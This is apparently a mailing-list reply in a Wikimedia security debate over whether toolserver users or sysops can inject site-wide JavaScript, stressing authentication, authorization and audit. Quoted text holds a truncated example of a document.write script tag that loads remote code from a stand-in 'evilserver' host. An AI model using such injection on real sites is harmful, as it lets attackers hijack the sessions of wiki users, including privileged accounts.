Gregory,
Domas, it seems you're out of touch with the
actual current behavior.
ORLY :)
Right now anyone that can edit the site wide scripts
can insert a
document.write('<script
src="http://evilserver.comr.com... and the
script loaded as a result of that can then have ongoing communication
with the user by itself inserting more script tags, which call a a
callback function with the result data.
"anyone that can edit" is:
- limited to single project
- elected by community
- has an audit trail
please be reminded, that security consists of three holy As:
- Authentication
- Authorization
- Audit
Though authentication to toolserver is very nice one (ssh keys,
etc!), authorization has slightly too wide scope, and there's no
change auditing.
Sysops are authenticated via HTTP, are authorized to change single
project, and all their actions are logged and monitored.
So you've made a case for limiting control of the
proxy functionality
to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site wide,
or throw a
script into MediaWiki ns thus making it available withjs
project-wide. ltwiki sysop can't edit enwiki javascript. ltwiki
toolserver user can affect enwiki.
And if you concern is "wikipedia account
integrity" you're wrong to
dismiss userscripts. Some are very very popular and are used by many
accounts with elevated rights, for example:
http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/
User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any
problems happen.
--
Domas Mituzas --
http://dammit.lt/ -- [[user:midom]]